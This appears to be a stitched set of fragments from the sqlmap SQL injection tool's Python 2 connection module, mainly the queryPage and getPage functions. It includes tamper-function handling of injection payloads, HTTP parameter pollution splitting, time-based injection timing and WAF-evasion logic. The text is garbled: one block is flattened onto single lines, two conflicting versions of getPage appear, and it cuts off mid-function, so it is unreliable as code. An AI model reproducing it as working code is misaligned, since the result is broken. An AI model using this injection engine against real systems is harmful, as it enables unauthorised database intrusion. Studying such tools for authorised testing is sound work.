payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] payload = ( payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') ) value = agent.replacePayload(value, payload) else: # GET, POST, URI and Cookie payloads need to be thoroughly URL encoded if ( place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode ): payload = urlencode(payload, "%", False, place != PLACE.URI) # spaceplus is handled down below value = agent.replacePayload(value, payload) if conf.hpp: if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): warnMsg = "HTTP parameter pollution should work only against " warnMsg += "ASP(.NET) targets" singleTimeWarnMessage(warnMsg) if place in (PLACE.GET, PLACE.POST): _ = re.escape(PAYLOAD_DELIMITER) match = re.search("(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value) if match: payload = match.group("value") for splitter in (urlencode(" "), " "): if splitter in payload: prefix, suffix = ( ("*/", "/*") if splitter == " " else (urlencode(_) for _ in ("*/", "/*")) ) parts = payload.split(splitter)
parts[0] = "%s%s" % (parts[0], suffix) parts[-1] = "%s%s=%s%s" % ( DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1], ) for i in xrange(1, len(parts) - 1): parts[i] = "%s%s=%s%s%s" % ( DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix, ) payload = "".join(parts) for splitter in (urlencode(","), ","): payload = payload.replace( splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name")) ) value = agent.replacePayload(value, payload) else: warnMsg = "HTTP parameter pollution works only with regular " warnMsg += "GET and POST parameters" singleTimeWarnMessage(warnMsg) if place: value = agent.removePayloadDelimiters(value) if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = ( conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value ) post = post.replace(ASTERISK_MARKER, "*") if post else post if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.USER_AGENT in conf.parameters: ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if value and place == PLACE.CUSTOM_HEADER: auxHeaders[value.split(",")[0]] = value.split(",", 1)[1] if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub( "%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString, ) return retVal for randomParameter in conf.rParam: for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) if conf.evalCode: delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER variables = {} originals = {} for item in filter(None, (get, post if not kb.postHint else None)): for part in item.split(delimiter): if "=" in part: name, value = part.split("=", 1) value = urldecode(value, convall=True, plusspace=(item == post and kb.postSpaceToPlus)) evaluateCode("%s=%s" % (name.strip(), repr(value)), variables) if cookie: for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER): if "=" in part: name, value = part.split("=", 1) value = urldecode(value, convall=True) evaluateCode("%s=%s" % (name.strip(), repr(value)), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): found = False value = unicode(value) regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), name, re.escape(delimiter)) 
if re.search(regex, (get or "")): found = True get = re.sub(regex, "\g<1>%s\g<3>" % value, get) if re.search(regex, (post or "")): found = True post = re.sub(regex, "\g<1>%s\g<3>" % value, post) regex = r"((\A|%s)%s=).+?(%s|\Z)" % ( re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ) if re.search(regex, (cookie or "")): found = True cookie = re.sub(regex, "\g<1>%s\g<3>" % value, cookie) if not found: if post is not None: post += "%s%s=%s" % (delimiter, name, value) elif get is not None: get += "%s%s=%s" % (delimiter, name, value) elif cookie is not None: cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value) if not conf.skipUrlEncode: get = urlencode(get, limit=True) if post is not None: if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif kb.postUrlEncode: post = urlencode(post, spaceplus=kb.postSpaceToPlus) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "[%s] [WARNING] time-based comparison requires " % time.strftime("%X") warnMsg += "larger statistical model, please wait" dataToStdout(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) dataToStdout(".") dataToStdout("\n") elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter " warnMsg += "during usage of time-based payloads to prevent potential " warnMsg += "errors " singleTimeWarnMessage(warnMsg) if not kb.laggingChecked: kb.laggingChecked = True deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. 
" warnMsg += "10 or more)" logger.critical(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage( url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host ) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False pushValue(kb.pageCompress) kb.pageCompress = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ), ) if headers: if ( kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers ): pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers: pageLength = int( headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find("/") + 1 :] ) kb.pageCompress = popValue() if not pageLength: try: page, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare, ) except MemoryError: page, headers, code = None, None, None warnMsg = "site returned insanely large response" if kb.testMode: warnMsg += " in testing phase. This is a common " warnMsg += "behavior in custom WAF/IDS/IPS solutions" singleTimeWarnMessage(warnMsg) if conf.secondOrder: page, headers, code = Connect.getPage( url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True, ) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastResponseDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return ( comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength), ) else: return comparison(page, headers, code, getRatioValue, pageLength)
def getPage(**kwargs): """ This method connects to the target url or proxy and returns the target url page content """ if conf.delay is not None and isinstance(conf.delay, (int, float)) and conf.delay > 0: time.sleep(conf.delay) elif conf.cpuThrottle: cpuThrottle(conf.cpuThrottle) threadData = getCurrentThreadData() threadData.lastRequestUID += 1 url = kwargs.get('url', conf.url) get = kwargs.get('get', None) post = kwargs.get('post', None) method = kwargs.get('method', None) cookie = kwargs.get('cookie', None) ua = kwargs.get('ua', None) referer = kwargs.get('referer', None) host = kwargs.get('host', conf.host) direct = kwargs.get('direct', False) multipart = kwargs.get('multipart', False) silent = kwargs.get('silent', False) raise404 = kwargs.get('raise404', True) auxHeaders = kwargs.get('auxHeaders', None) response = kwargs.get('response', False) ignoreTimeout = kwargs.get('ignoreTimeout', kb.ignoreTimeout) refreshing = kwargs.get('refreshing', False) retrying = kwargs.get('retrying', False) crawling = kwargs.get('crawling', False) if not urlparse.urlsplit(url).netloc: url = urlparse.urljoin(conf.url, url) # flag to know if we are dealing with the same target host target = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""])) if not retrying: # Reset the number of connection retries threadData.retriesCount = 0 # fix for known issue when urllib2 just skips the other part of provided # url splitted with space char while urlencoding it in the later phase url = url.replace(" ", "%20") code = None page = None requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post else HTTPMETHOD.GET)) requestMsg += "%s" % urlparse.urlsplit(url)[2] or "/" responseMsg = u"HTTP response " requestHeaders = u"" responseHeaders = None logHeaders = u"" skipLogTraffic = False raise404 = raise404 and not kb.ignoreNotFound # support for non-latin (e.g. cyrillic) URLs as urllib/urllib2 doesn't # support those by default url = asciifyUrl(url) # fix for known issues when using url in unicode format # (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case) url = unicodeencode(url) try: if silent: socket.setdefaulttimeout(HTTP_SILENT_TIMEOUT) else: socket.setdefaulttimeout(conf.timeout) if direct: if "?" 
in url: url, params = url.split("?") params = urlencode(params) url = "%s?%s" % (url, params) requestMsg += "?%s" % params elif multipart: # Needed in this form because of potential circle dependency # problem (option -> update -> connect -> option) from lib.core.option import proxyHandler multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler) conn = multipartOpener.open(unicodeencode(url), multipart) page = Connect.__connReadProxy(conn) responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) return page elif any ([refreshing, crawling]): pass elif target: if conf.parameters.has_key(PLACE.GET) and not get: get = conf.parameters[PLACE.GET] if get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get if conf.method == HTTPMETHOD.POST and not post: for place in (PLACE.POST, PLACE.SOAP): if conf.parameters.has_key(place): post = conf.parameters[place] break elif get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str # Prepare HTTP headers headers = forgeHeaders({ HTTPHEADER.COOKIE: cookie, HTTPHEADER.USER_AGENT: ua, HTTPHEADER.REFERER: referer }) if conf.realTest: headers[HTTPHEADER.REFERER] = "%s://%s" % (conf.scheme, conf.hostname) if kb.authHeader: headers[HTTPHEADER.AUTHORIZATION] = kb.authHeader if kb.proxyAuthHeader: headers[HTTPHEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader headers[HTTPHEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE headers[HTTPHEADER.HOST] = host or getHostHeader(url) if auxHeaders: for key, item in auxHeaders.items(): headers[key] = item for key, item in headers.items(): del headers[key] headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding) post = unicodeencode(post, kb.pageEncoding) if method: req = MethodRequest(url, post, headers) req.set_method(method) else: req = urllib2.Request(url, post, headers) if not req.has_header(HTTPHEADER.ACCEPT_ENCODING): requestHeaders += "%s: identity\n" % HTTPHEADER.ACCEPT_ENCODING requestHeaders += "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items()) if not req.has_header(HTTPHEADER.COOKIE) and conf.cj: conf.cj._policy._now = conf.cj._now = int(time.time()) cookies = conf.cj._cookies_for_request(req) requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies)) if not req.has_header(HTTPHEADER.CONNECTION): requestHeaders += "\n%s: close" % HTTPHEADER.CONNECTION requestMsg += "\n%s" % requestHeaders if post: requestMsg += "\n\n%s" % getUnicode(post) requestMsg += "\n" threadData.lastRequestMsg = requestMsg logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) conn = urllib2.urlopen(req) if not kb.authHeader and req.has_header(HTTPHEADER.AUTHORIZATION): kb.authHeader = req.get_header(HTTPHEADER.AUTHORIZATION) if not kb.proxyAuthHeader and req.has_header(HTTPHEADER.PROXY_AUTHORIZATION): kb.proxyAuthHeader = req.get_header(HTTPHEADER.PROXY_AUTHORIZATION) # Return response object if response: return conn, None, None # Get HTTP response if hasattr(conn, 'redurl'): page = threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ else Connect.__connReadProxy(conn) skipLogTraffic = kb.redirectChoice == REDIRECTION.NO code = conn.redcode else: page = Connect.__connReadProxy(conn) code = code or conn.code 
responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) status = getUnicode(conn.msg) if extractRegexResult(META_REFRESH_REGEX, page, re.DOTALL | re.IGNORECASE) and not refreshing: url = extractRegexResult(META_REFRESH_REGEX, page, re.DOTALL | re.IGNORECASE) debugMsg = "got HTML meta refresh header" logger.debug(debugMsg) if kb.alwaysRefresh is None: msg = "sqlmap got a refresh request " msg += "(redirect like response common to login pages). " msg += "Do you want to apply the refresh " msg += "from now on (or stay on the original page)? [Y/n]" choice = readInput(msg, default="Y") kb.alwaysRefresh = choice not in ("n", "N") if kb.alwaysRefresh: if url.lower().startswith('http://'): kwargs['url'] = url else: kwargs['url'] = conf.url[:conf.url.rfind('/')+1] + url threadData.lastRedirectMsg = (threadData.lastRequestUID, page) kwargs['refreshing'] = True kwargs['get'] = None kwargs['post'] = None try: return Connect.__getPageProxy(**kwargs) except sqlmapSyntaxException: pass # Explicit closing of connection object if not conf.keepAlive: try: if hasattr(conn.fp, '_sock'): conn.fp._sock.close() conn.close() except Exception, msg: warnMsg = "problem occured during connection closing ('%s')" % msg logger.warn(warnMsg) except urllib2.HTTPError, e: page = None responseHeaders = None try: page = e.read() responseHeaders = e.info() responseHeaders[URI_HTTP_HEADER] = e.geturl() page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) except socket.timeout: warnMsg = "connection timed out while trying " warnMsg += "to get error page information (%d)" % e.code logger.warn(warnMsg) return None, None, None except KeyboardInterrupt: raise except: pass finally: page = page if isinstance(page, unicode) else getUnicode(page) code = e.code threadData.lastHTTPError = (threadData.lastRequestUID, code) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 status = getUnicode(e.msg) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: logHeaders = "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in responseHeaders.items()) logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, page)) skipLogTraffic = True if conf.verbose <= 5: responseMsg += getUnicode(logHeaders) elif conf.verbose > 5: responseMsg += "%s\n\n%s\n" % (logHeaders, page) logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) if e.code == httplib.UNAUTHORIZED: errMsg = "not authorized, try to provide right HTTP " errMsg += "authentication type and valid credentials (%d)" % code raise sqlmapConnectionException, errMsg elif e.code == httplib.NOT_FOUND: if raise404: errMsg = "page not found (%d)" % code raise sqlmapConnectionException, errMsg else: debugMsg = "page not found (%d)" % code logger.debug(debugMsg) processResponse(page, responseHeaders) elif e.code == httplib.GATEWAY_TIMEOUT: if ignoreTimeout: return None, None, None else: warnMsg = "unable to connect to the target url (%d - %s)" % (e.code, httplib.responses[e.code]) if threadData.retriesCount < conf.retries and not kb.threadException and not conf.realTest: warnMsg += ", sqlmap is going to retry the request" logger.critical(warnMsg) return Connect.__retryProxy(**kwargs) elif kb.testMode: logger.critical(warnMsg) return None, None, None else: raise 
sqlmapConnectionException, warnMsg else: debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg)
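# getPage funnels every URL through asciifyUrl because urllib2 cannot handle
# non-Latin characters in URLs. A rough sketch of what such a helper has to do,
# under the assumption of a unicode input and utf-8 percent-encoding (this is
# not sqlmap's actual implementation):

import urllib
import urlparse

def asciify_url(url):
    parts = urlparse.urlsplit(url)
    host = parts.hostname.encode("idna") if parts.hostname else ""
    netloc = "%s:%d" % (host, parts.port) if parts.port else host
    # percent-encode non-ASCII bytes left in the path; '%' stays safe so that
    # already-encoded sequences survive a second pass
    path = urllib.quote(parts.path.encode("utf-8"), safe="/%")
    return urlparse.urlunsplit((parts.scheme, netloc, path, parts.query, parts.fragment))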
def getPage(**kwargs):
    """
    This method connects to the target url or proxy and returns
    the target url page content
    """

    if conf.delay is not None and isinstance(conf.delay, (int, float)) and conf.delay > 0:
        time.sleep(conf.delay)
    elif conf.cpuThrottle:
        cpuThrottle(conf.cpuThrottle)

    threadData = getCurrentThreadData()
    threadData.lastRequestUID += 1

    # dirty hack because urllib2 just skips the other part of the provided
    # url split with a space char while urlencoding it in the later phase
    url = kwargs.get('url', conf.url).replace(" ", "%20")
    get = kwargs.get('get', None)
    post = kwargs.get('post', None)
    method = kwargs.get('method', None)
    cookie = kwargs.get('cookie', None)
    ua = kwargs.get('ua', None)
    referer = kwargs.get('referer', None)
    direct = kwargs.get('direct', False)
    multipart = kwargs.get('multipart', False)
    silent = kwargs.get('silent', False)
    raise404 = kwargs.get('raise404', True)
    auxHeaders = kwargs.get('auxHeaders', None)
    response = kwargs.get('response', False)
    ignoreTimeout = kwargs.get('ignoreTimeout', False)
    refreshing = kwargs.get('refreshing', False)

    page = ""
    cookieStr = ""
    requestMsg = "HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, conf.method)
    requestMsg += "%s" % urlparse.urlsplit(url)[2] or "/"
    responseMsg = "HTTP response "
    requestHeaders = ""
    responseHeaders = None
    logHeaders = ""

    try:
        if silent:
            socket.setdefaulttimeout(HTTP_SILENT_TIMEOUT)

        if direct:
            if "?" in url:
                url, params = url.split("?")
                params = urlencode(params)
                url = "%s?%s" % (url, params)
                requestMsg += "?%s" % params

        elif multipart:
            # Needed in this form because of potential circle dependency
            # problem (option -> update -> connect -> option)
            from lib.core.option import proxyHandler

            multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler)
            conn = multipartOpener.open(url, multipart)
            page = conn.read()
            responseHeaders = conn.info()
            responseHeaders[URI_HTTP_HEADER] = conn.geturl()
            page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE))

            return page

        elif refreshing:
            # Reference(s):
            # http://vancouver-webpages.com/META/metatags.detail.html
            # http://webdesign.about.com/od/metataglibraries/a/aa080300a.htm
            get = None
            post = None

        else:
            if conf.parameters.has_key(PLACE.GET) and not get:
                get = conf.parameters[PLACE.GET]

            if get:
                url = "%s?%s" % (url, get)
                requestMsg += "?%s" % get

            if conf.method == HTTPMETHOD.POST:
                if conf.parameters.has_key(PLACE.POST) and not post:
                    post = conf.parameters[PLACE.POST]

        requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str

        # Perform HTTP request
        headers = forgeHeaders(cookie, ua, referer)

        if conf.realTest:
            headers[HTTPHEADER.REFERER] = "%s://%s" % (conf.scheme, conf.hostname)

        if kb.authHeader:
            headers[HTTPHEADER.AUTHORIZATION] = kb.authHeader

        if kb.proxyAuthHeader:
            headers[HTTPHEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader

        if auxHeaders:
            for key, item in auxHeaders.items():
                headers[key] = item

        for key, item in headers.items():
            del headers[key]
            headers[encodeUnicode(key, kb.pageEncoding)] = encodeUnicode(item, kb.pageEncoding)

        post = encodeUnicode(post, kb.pageEncoding)

        if method:
            req = MethodRequest(url, post, headers)
            req.set_method(method)
        else:
            req = urllib2.Request(url, post, headers)

        if not conf.dropSetCookie and conf.cj:
            for _, cookie in enumerate(conf.cj):
                if not cookieStr:
                    cookieStr = "Cookie: "

                cookie = getUnicode(cookie)
                index = cookie.index(" for ")

                cookieStr += "%s; " % cookie[8:index]

        if not req.has_header(HTTPHEADER.ACCEPT_ENCODING):
            requestHeaders += "%s: identity\n" % HTTPHEADER.ACCEPT_ENCODING

        requestHeaders += "\n".join(["%s: %s" % (header, value) for header, value in req.header_items()])

        if not req.has_header(HTTPHEADER.COOKIE) and cookieStr:
            requestHeaders += "\n%s" % cookieStr[:-2]

        if not req.has_header(HTTPHEADER.CONNECTION):
            requestHeaders += "\n%s: close" % HTTPHEADER.CONNECTION

        requestMsg += "\n%s" % requestHeaders

        if post:
            requestMsg += "\n\n%s" % post

        requestMsg += "\n"

        logger.log(8, requestMsg)

        conn = urllib2.urlopen(req)

        if not kb.authHeader and req.has_header(HTTPHEADER.AUTHORIZATION):
            kb.authHeader = req.get_header(HTTPHEADER.AUTHORIZATION)

        if not kb.proxyAuthHeader and req.has_header(HTTPHEADER.PROXY_AUTHORIZATION):
            kb.proxyAuthHeader = req.get_header(HTTPHEADER.PROXY_AUTHORIZATION)

        if hasattr(conn, "setcookie"):
            kb.redirectSetCookie = conn.setcookie

        if hasattr(conn, "redurl") and hasattr(conn, "redcode") and not conf.redirectHandled and not conf.realTest:
            msg = "sqlmap got a %d redirect to " % conn.redcode
            msg += "%s - What target address do you " % conn.redurl
            msg += "want to use from now on? %s " % conf.url
            msg += "(default) or provide another target address based "
            msg += "also on the redirection got from the application\n"

            while True:
                choice = readInput(msg, default=None)

                if not choice:
                    pass
                else:
                    conf.url = choice
                    try:
                        parseTargetUrl()
                        return Connect.__getPageProxy(**kwargs)
                    except sqlmapSyntaxException:
                        continue

                break

            conf.redirectHandled = True

        # Reset the number of connection retries
        kb.retriesCount = 0

        # Return response object
        if response:
            return conn, None

        # Get HTTP response
        page = conn.read()
        code = conn.code
        responseHeaders = conn.info()
        responseHeaders[URI_HTTP_HEADER] = conn.geturl()
        page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE))
        status = getUnicode(conn.msg)

        if extractRegexResult(META_REFRESH_REGEX, page, re.DOTALL | re.IGNORECASE) and not refreshing:
            url = extractRegexResult(META_REFRESH_REGEX, page, re.DOTALL | re.IGNORECASE)

            if url.lower().startswith('http://'):
                kwargs['url'] = url
            else:
                kwargs['url'] = conf.url[:conf.url.rfind('/') + 1] + url

            threadData.lastRedirectMsg = (threadData.lastRequestUID, page)
            kwargs['refreshing'] = True

            debugMsg = "got HTML meta refresh header"
            logger.debug(debugMsg)

            try:
                return Connect.__getPageProxy(**kwargs)
            except sqlmapSyntaxException:
                pass

        # Explicit closing of connection object
        if not conf.keepAlive:
            try:
                conn.fp._sock.close()
                conn.close()
            except Exception, msg:
                warnMsg = "problem occurred during connection closing ('%s')" % msg
                logger.warn(warnMsg)

    except urllib2.HTTPError, e:
        page = None
        responseHeaders = None

        try:
            page = e.read()
            responseHeaders = e.info()
            responseHeaders[URI_HTTP_HEADER] = e.geturl()
            page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE))
        except socket.timeout:
            warnMsg = "connection timed out while trying "
            warnMsg += "to get error page information (%d)" % e.code
            logger.warn(warnMsg)
            return None, None
        except:
            pass

        code = e.code
        threadData.lastHTTPError = (threadData.lastRequestUID, code)

        if code not in kb.httpErrorCodes:
            kb.httpErrorCodes[code] = 0

        kb.httpErrorCodes[code] += 1

        status = getUnicode(e.msg)
        responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)

        if responseHeaders:
            logHeaders = "\n".join(["%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in responseHeaders.items()])

        logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, page if isinstance(page, unicode) else getUnicode(page)))

        if conf.verbose <= 5:
            responseMsg += getUnicode(logHeaders)
        elif conf.verbose > 5:
            responseMsg += "%s\n\n%s\n" % (logHeaders, page)

        logger.log(7, responseMsg)

        if e.code == 401:
            errMsg = "not authorized, try to provide right HTTP "
            errMsg += "authentication type and valid credentials (%d)" % code
            raise sqlmapConnectionException, errMsg
        elif e.code == 404 and raise404:
            errMsg = "page not found (%d)" % code
            raise sqlmapConnectionException, errMsg
        else:
            debugMsg = "got HTTP error code: %d (%s)" % (code, status)
            logger.debug(debugMsg)

    page = processResponse(page, responseHeaders)

    return page, responseHeaders
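getPage follows HTML meta refresh redirects by rewriting kwargs['url'] and re-entering itself via Connect.__getPageProxy. A minimal standalone sketch of the same idea follows; the regex here is an illustrative approximation, not sqlmap's actual META_REFRESH_REGEX, and follow_meta_refresh is a hypothetical helper:

import re

# Illustrative meta-refresh pattern (sqlmap's META_REFRESH_REGEX differs);
# group 1 captures the redirect target
_META_REFRESH = re.compile(r'<meta\s+http-equiv=["\']?refresh["\']?[^>]*'
                           r'url=([^"\'>\s]+)', re.I | re.S)

def follow_meta_refresh(base_url, page):
    """Return the absolute refresh target found in 'page', or None."""
    match = _META_REFRESH.search(page or "")
    if not match:
        return None
    url = match.group(1)
    if url.lower().startswith("http"):
        return url
    # relative target: resolve against the directory of the base url,
    # mirroring conf.url[:conf.url.rfind('/') + 1] + url in getPage()
    return base_url[:base_url.rfind('/') + 1] + url

print(follow_meta_refresh("http://target/app/index.php",
                          '<meta http-equiv="refresh" content="0; url=login.php">'))
# -> http://target/app/login.php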
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True):
    """
    This method calls a function to get the target URL page content
    and returns its page MD5 hash or a boolean value in case of
    string match check ('--string' command line parameter)
    """

    ########### Connect the Database directly
    if conf.direct:
        return direct(value, content)

    get = None
    post = None
    cookie = None
    ua = None
    referer = None
    host = None
    page = None
    pageLength = None
    uri = None
    code = None

    # print "place -----", place
    if not place:
        # print kb.injection.place
        # print "place.get:", PLACE.GET
        place = kb.injection.place or PLACE.GET  # kb.injection.place = None, PLACE.GET = 'GET'

    if not auxHeaders:
        auxHeaders = {}

    raise404 = place != PLACE.URI if raise404 is None else raise404

    value = agent.adjustLateValues(value)
    """
    print "------------------------- value ---------------------------"
    print value
    print "----------------------------------------------------------"
    """
    payload = agent.extractPayload(value)
    """
    payload_file = open("payload_file", "a")
    print "------------------ Payload -------------------------"
    print >>payload_file, payload
    payload_file.close()
    """
    threadData = getCurrentThreadData()
    # print type(threadData)

    if conf.httpHeaders:
        headers = OrderedDict(conf.httpHeaders)
        contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())

        if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode:
            kb.postUrlEncode = False
            conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType]
            contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE)
            conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))

    if payload:
        if kb.tamperFunctions:
            for function in kb.tamperFunctions:
                try:
                    payload = function(payload=payload, headers=auxHeaders)
                except Exception, ex:
                    errMsg = "error occurred while running tamper "
                    errMsg += "function '%s' ('%s')" % (function.func_name, ex)
                    raise SqlmapGenericException(errMsg)

                if not isinstance(payload, basestring):
                    errMsg = "tamper function '%s' returns " % function.func_name
                    errMsg += "invalid payload type ('%s')" % type(payload)
                    raise SqlmapValueException(errMsg)

            value = agent.replacePayload(value, payload)

        logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload))

        if place == PLACE.CUSTOM_POST and kb.postHint:
            if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
                # payloads in SOAP/XML should have chars > and < replaced
                # with their HTML encoded counterparts
